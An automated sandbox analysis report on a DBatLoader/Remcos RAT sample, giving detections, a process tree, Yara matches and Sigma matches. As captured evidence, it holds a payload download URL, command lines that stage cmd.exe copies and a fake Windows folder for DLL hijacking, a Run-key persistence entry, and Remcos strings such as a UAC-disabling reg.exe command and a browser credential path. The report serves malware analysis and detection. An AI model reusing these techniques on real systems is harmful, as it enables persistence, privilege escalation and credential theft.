Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nft438A5fN.exe

Overview

General Information

Sample name:nft438A5fN.exe
renamed because original name is a hash value
Original sample name:02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617.exe
Analysis ID:1562863
MD5:1a4d920b70293f85958a9a2cde581f6f
SHA1:756015ae8f1b03f14bc1126e6b2183a383631186
SHA256:02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nft438A5fN.exe (PID: 520 cmdline: "C:\Users\user\Desktop\nft438A5fN.exe" MD5: 1A4D920B70293F85958A9A2CDE581F6F)
    • cmd.exe (PID: 908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 1508 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 5200 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 2160 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5576 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5588 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 6188 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 2160 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2940 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 3016 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 3700 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 4280 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • WerFault.exe (PID: 6588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Wuqtggvo.PIF (PID: 7100 cmdline: "C:\Users\Public\Libraries\Wuqtggvo.PIF" MD5: 1A4D920B70293F85958A9A2CDE581F6F)
    • colorcpl.exe (PID: 432 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • WerFault.exe (PID: 1508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 5444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Wuqtggvo.PIF (PID: 2888 cmdline: "C:\Users\Public\Libraries\Wuqtggvo.PIF" MD5: 1A4D920B70293F85958A9A2CDE581F6F)
    • SndVol.exe (PID: 1376 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
      • WerFault.exe (PID: 3148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6ca48:$a1: Remcos restarted by watchdog!
        • 0x6cfc0:$a3: %02i:%02i:%02i:%03i
        0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Click to see the 37 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          33.2.SndVol.exe.3290000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            33.2.SndVol.exe.3290000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              33.2.SndVol.exe.3290000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                33.2.SndVol.exe.3290000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6c4b8:$a1: Remcos restarted by watchdog!
                • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                33.2.SndVol.exe.3290000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6657c:$str_b2: Executing file:
                • 0x675fc:$str_b3: GetDirectListeningPort
                • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x67128:$str_b7: \update.vbs
                • 0x665a4:$str_b9: Downloaded file:
                • 0x66590:$str_b10: Downloading file:
                • 0x66634:$str_b12: Failed to upload file:
                • 0x675c4:$str_b13: StartForward
                • 0x675e4:$str_b14: StopForward
                • 0x67080:$str_b15: fso.DeleteFile "
                • 0x67014:$str_b16: On Error Resume Next
                • 0x670b0:$str_b17: fso.DeleteFolder "
                • 0x66624:$str_b18: Uploaded file:
                • 0x665e4:$str_b19: Unable to delete:
                • 0x67048:$str_b20: while fso.FileExists("
                • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 38 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\nft438A5fN.exe, ProcessId: 520, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                Sigma detected: Execution from Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 908, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2160, ProcessName: alpha.pif
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wuqtggvo.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nft438A5fN.exe, ProcessId: 520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wuqtggvo
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wuqtggvo.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nft438A5fN.exe, ProcessId: 520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wuqtggvo
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 908, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2160, ProcessName: alpha.pif
                Sigma detected: Uncommon Child Processes Of SndVol.exe
                Source: Process startedAuthor: X__Junior (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 1376, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608, ProcessId: 3148, ProcessName: WerFault.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-26T08:12:15.955374+010020283713Unknown Traffic192.168.2.849706142.250.181.129443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: nft438A5fN.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFAvira: detection malicious, Label: TR/AD.Nekark.iteef
                Found malware configuration
                Source: nft438A5fN.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFReversingLabs: Detection: 57%
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFVirustotal: Detection: 68%Perma Link
                Multi AV Scanner detection for submitted file
                Source: nft438A5fN.exeReversingLabs: Detection: 57%
                Source: nft438A5fN.exeVirustotal: Detection: 68%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: nft438A5fN.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_032338C8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,21_2_02EB38C8
                Source: nft438A5fN.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03207538 _wcslen,CoGetObject,11_2_03207538
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E87538 _wcslen,CoGetObject,21_2_02E87538
                Source: nft438A5fN.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
                Source: Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02C95908
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00050207
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_0005589A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00063E66
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00054EC1
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_0004532E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0321C322
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0320C388
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0320928E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_032096A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_03219B86
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03207877 FindFirstFileW,FindNextFileW,11_2_03207877
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_03208847
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0324E8F9 FindFirstFileExA,11_2_0324E8F9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0320BD72
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_0005589A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00050207
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00063E66
